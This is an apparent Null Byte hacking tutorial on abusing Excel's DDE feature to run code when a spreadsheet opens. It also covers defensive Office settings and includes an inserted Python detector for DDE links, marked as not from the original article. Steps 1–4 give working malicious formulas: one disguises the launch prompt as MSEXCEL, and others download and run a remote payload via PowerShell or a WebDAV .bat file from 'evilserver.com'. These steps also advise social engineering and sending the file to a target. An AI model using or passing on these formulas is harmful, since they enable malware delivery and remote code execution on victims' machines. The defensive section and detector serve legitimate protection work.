
How to Exploit DDE in Microsoft Office & Defend Against DDE-Based Attacks « Null Byte :: WonderHowTo

In our previous article, we learned how to take advantage of a feature, Dynamic Data Exchange (DDE), to run malicious code when an MS Word document is opened. Because Microsoft built DDE into all of its Office products as a way to transfer data once or continuously between applications, we can do the same thing in Excel to create a spreadsheet that runs malicious code when opened. The best part is that it does so without requiring macros to be enabled.

Necurs Botnet Employs DDE Attack to Spread Ransomware

In the time since its discovery as an attack vector, many black hats have been successful in utilizing DDE. For example, the hackers behind the Necurs botnet, one of the largest at 6 million, have been attempting to distribute Locky ransomware. They first use the botnet to send a surprisingly simple email.

Image by Brad Duncan/SANS ISC InfoSec Forums

This particular email contains an attached Word document which uses DDE to open PowerShell and execute their code. The method is illustrated below.

Image by Brad Duncan/SANS ISC InfoSec Forums

Hancitor Malware Uses a DDE Attack, Too

Hancitor malspam, which is also referred to as Chanitor or Tordal, is of particular note as it is an example of malware that has changed tactics. It used to rely on macros, but since Oct. 16, 2017, it has begun to use DDE.


Below, we can see one of the best examples of social engineering that I've seen, which it uses to spread.

Image by Brad Duncan/SANS ISC InfoSec Forums

The likely reason for the change from macros to DDE is that the user will no longer get any explicit security warnings. That being said, you do still get prompts when using DDE, such as the one below.

Image by Brad Duncan/SANS ISC InfoSec Forums

Well, okay. I might not click through that. With the amount of work that was put into social engineering the Word document, it's interesting that the hackers behind Hancitor didn't make any attempts to modify the prompt to be less conspicuous. Many people, such as Ryan Hanson on Twitter, have shown how this can be done.

Image by ryHanson/Twitter

Many hackers have been focused on using DDE in Word. In the last article, we looked at using DDE in the fields of a Word document ourselves. However, DDE can also be used in Excel, Quattro Pro, and Visual Basic. It's surprisingly easy to employ in Excel, so let's take a quick look at how it can be done.


Step 1: Open Excel

Start by opening Excel, nothing fancy. Now we could leave it at that with this step, but for any practical real-world use, we need to spice it up with some social engineering. For this to work, we have two requirements: the target will need to click "Update" on the first popup and click "Yes" on the next.

This social-engineering attack takes advantage of the fact that the user can see the document when the popup appears. This lets us put something at the top of the document to make it appear more legitimate to the user. We just reviewed two examples above that you can use for inspiration.

Step 2: Add a Formula

DDE allows us to perform command execution through Excel formulas. Excel uses it as an interprocess communication mechanism, which can be used to call applications from within formulas and even process web requests to return live data to the workbook.

In simple terms, that lets us write a short formula to start a command prompt. Just add it to the formula field for any cell.


Let's look at what we just typed. The cmd is without an extension, but it tells Excel to open cmd.exe all the same. If you are interested, Microsoft has more DDE commands. The second part in single quotes is the arguments we are passing it.

Here I used /k for a persistent shell, but you could also use /c for a one-off command. Unfortunately, the argument is limited to 1,024 bytes, the maximum cmd length for the CreateProcess() function.

Let's take a quick look at it in action using calc.exe in place of whatever dubious code we may want to run.

=cmd|'/c calc.exe'!A1

After you enter it into a cell, save and close the Excel spreadsheet, then reopen the document. You'll be greeted with the first of two prompts. "Update" needs to be clicked for our code to run.

Then we get the second one. Notice how it says "Start application 'CMD.EXE'?" That should be a red flag for anyone in the know, and will likely prevent them from clicking "Yes." I'll show you how we can change that in the next step.

Once "Yes" is clicked, we get magic code execution.

Step 3: Add Code

Now that we understand the basics, we can play around with it a bit. Remember how I said we can edit the "Start application" popup? It's actually quite easy to do, as it's just showing the first application we are attempting to run.

This allows us to obfuscate it by hiding cmd.exe behind another less conspicuous application, like Excel itself, but it will chew through some of our 1,024-byte limit. Try this in a cell formula:

=MSEXCEL|'……WindowsSystem32cmd.exe /c calc.exe'!"

Once you press enter, you should see the new popup. Notice how it says "Start application 'MSEXCEL.EXE'?" It would be very easy to work that into any social engineering you do in the document.

After you click "Yes," you'll see that it executes the code just as before.

Now, what if we wanted to run something more powerful than a calculator? SensePost has been kind enough to provide an example of how to use it to open PowerShell and remotely load a script to execute. To do so, you would type the following formula.

=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://evilserver.com/sp.base64");powershell -e $e'!A1

— saif/SensePost

However, in reality, that's more complicated than we need. It's easier to just point cmd /c directly at a .bat script hosted in a WebDAV directory. We'll do that instead below.

=cmd|'/c \evilserver.comsp.bat;IEX $e'!A1

— Etienne

You likely noticed that SensePost used =cmd, which we just learned how to obfuscate, so let's combine the two to fix that real quick.

=MSEXCEL|'……WindowsSystem32cmd.exe /c \evilserver.comsp.bat;IEX $e'!"

Now we have an Excel formula that hides what application it is actually running, and then downloads and executes a .bat file from our remote server. It doesn't take much imagination to see the mayhem we could cause with this.


Step 4: Save & Send

The last thing to do is save the document and send it off to the target. In the video below, you can see what this might look like on the receiving end if you were to download such a document using our obfuscation technique.

Step 5: Update Your Defense

Today, we've looked at a quick and simple way to execute code when an Excel document is opened. While this isn't unique, what is special about this attack is that the word "security" is never mentioned, allowing a much greater chance for a social-engineering attack to succeed.

If you're a Microsoft Office user, you should be careful of these and other warnings that may indicate another program is attempting to execute, or that a file is either requesting outside resources or needs unusual permissions to run. In all of these instances, your default reaction to a window like this popping up should be to deny permission.

You can take this a step further. If you don't trust yourself to remember to say no to these popups, or just never want to see them, you can get rid of them by disabling automatic links. These settings don't carry across all Office programs, so you will need to open each one and update the settings manually, but the process is the same for them all. Here's how to do it in Word.

Open Word or any other Office app you use and click on "File" in the top left. Then, when a blue bar appears along the left of the screen, click "Options," which will be at the very bottom. The Word Options box will appear. Click on the "Advanced" tab, then scroll almost all the way down until you see General and uncheck "Update automatic links at open."

Once that is done, click "OK" to save the changes. This update to the settings will prevent DDE attacks from working, without impacting your everyday use of Word.

If you have multiple machines under management control, you can disable DDE execution via registry keys.
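Beyond turning the prompts off, a defender can look for these formulas before a user ever sees them. As an added example that is not part of the original article, here is a Python check that opens an .xlsx container and reports any DDE link in it, whatever application name the popup would show; the constructed sample carries the calc.exe formula from Step 2.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Added example, not code from the original article: a defender-side check that lists
# DDE links in an .xlsx. Excel stores a formula such as =cmd|'/c calc.exe'!A1 (Step 2
# above) as a <ddeLink> in xl/externalLinks/externalLinkN.xml: the program goes into
# ddeService, its arguments into ddeTopic and the cell reference into a <ddeItem>.
SML = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"


def find_dde_links(xlsx_bytes: bytes) -> list:
    """Return (part, service, topic, items) for every DDE link in the workbook."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("xl/externalLinks/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(zf.read(name))
            for link in root.iter(SML + "ddeLink"):
                items = [i.get("name", "") for i in link.iter(SML + "ddeItem")]
                hits.append((name, link.get("ddeService", ""), link.get("ddeTopic", ""), items))
    return hits


def has_dde(xlsx_bytes: bytes) -> bool:
    """Any DDE link at all is worth a look: the MSEXCEL trick above only changes
    the popup text, the <ddeLink> element is still there in the file."""
    return bool(find_dde_links(xlsx_bytes))


def build_sample(parts: dict) -> bytes:
    """Pack part name -> XML into an in-memory zip; enough of an OOXML container for the check."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


# Constructed sample: the external-link part Excel writes for =cmd|'/c calc.exe'!A1.
DDE_LINK_PART = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    '<ddeLink ddeService="cmd" ddeTopic="/c calc.exe"><ddeItems>'
    '<ddeItem name="A1" advise="1"/></ddeItems></ddeLink></externalLink>'
)
SAMPLE_BAD = build_sample({"xl/workbook.xml": "<workbook/>",
                           "xl/externalLinks/externalLink1.xml": DDE_LINK_PART})
SAMPLE_CLEAN = build_sample({"xl/workbook.xml": "<workbook/>"})

if __name__ == "__main__":
    for label, blob in (("bad.xlsx", SAMPLE_BAD), ("clean.xlsx", SAMPLE_CLEAN)):
        for part, service, topic, items in find_dde_links(blob):
            print(f"{label}: {part} launches {service!r} with {topic!r} for cells {items}")
        print(f"{label}: {'DDE link present' if has_dde(blob) else 'no DDE links'}")
```

Point find_dde_links at the bytes of a real workbook (for example from a mail gateway quarantine) to get the same report; the legacy .xls binary format is not covered by this check.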

DDE-Based Attacks in the Future

Clearly, there has been a spike in DDE use in the past few weeks. In spite of this, researchers like Brad Duncan don't think it will continue like this for long.

I think attackers are using DDE because it's different. We've been seeing the same macro-based attacks for years now, so perhaps criminals are trying something different just to see if it works any better. In my opinion, DDE is probably a little less effective than using macros. […] We might see more DDE-based attacks in the coming weeks, but I predict that will taper off in the next few months.

— Brad Duncan via Threatpost

That being said, new DDE attack vectors are still being discovered every day. For example, Kevin Beaumont discovered it could be used in Outlook.

Image by GossiTheDog/Twitter

Then r0lan discovered not even your Microsoft contacts are safe from DDE.

Image by yeyint_mth/Twitter

There's no telling what the next DDE attack vector will be, but you can be sure that I'll write a how-to for it.

Thanks for reading! If you have any questions, you can ask here or on Twitter @The_Hoid.

Cover image via Sense Post/YouTube; Screenshots by Hoid/Null Byte (unless otherwise noted)
